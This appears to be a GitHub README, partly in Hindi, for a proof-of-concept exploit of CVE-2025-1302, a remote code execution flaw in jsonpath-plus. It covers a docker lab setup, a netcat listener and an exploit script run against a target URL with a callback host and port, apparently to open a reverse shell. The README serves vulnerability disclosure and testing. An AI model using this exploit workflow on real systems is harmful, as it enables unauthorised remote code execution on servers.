
JSONPath-plus Remote Code Execution
★ CVE-2025-1302 JSONPath-plus RCE PoC ★
https://github.com/user-attachments/assets/5d791540-ef6c-4cd0-bd25-7a1dbbd194fb
docker build -t jsonpath:10.2.0 .
docker run --rm --name jsonpath -p 3000:3000 jsonpath:10.2.0
localhost:3000

पैकेज jsonpath-plus के 10.3.0 से पहले के संस्करण अनुचित इनपुट स्वच्छता के कारण रिमोट कोड निष्पादन (RCE) के लिए संवेदनशील हैं। एक हमलावर eval='safe' मोड के असुरक्षित डिफ़ॉल्ट उपयोग का शोषण करके सिस्टम पर मनमाना कोड निष्पादित कर सकता है। नोट: यह CVE-2024-21534 के अधूरे सुधार के कारण होता है।
git clone https://github.com/EQSTLab/CVE-2025-1302.git
cd CVE-2025-1302
pip install -r requirements.txt
nc -l -p <LPORT>
python3 CVE-2025-1302.py -u <URL_TO_EXPLOIT> -i <LHOST> -p <LPORT>


यह रिपॉजिटरी CVE-2025-1302 के RCE शोषण के रूप में अभिप्रेत नहीं है। इस परियोजना का उद्देश्य लोगों को इस कमजोरी के बारे में सीखने और शायद अपने स्वयं के अनुप्रयोगों का परीक्षण करने में मदद करना है।
We publish CVE and malware analysis once a month. If you're interested, please follow the links below to check out our publications. https://www.skshieldus.com/eng/business/insight.do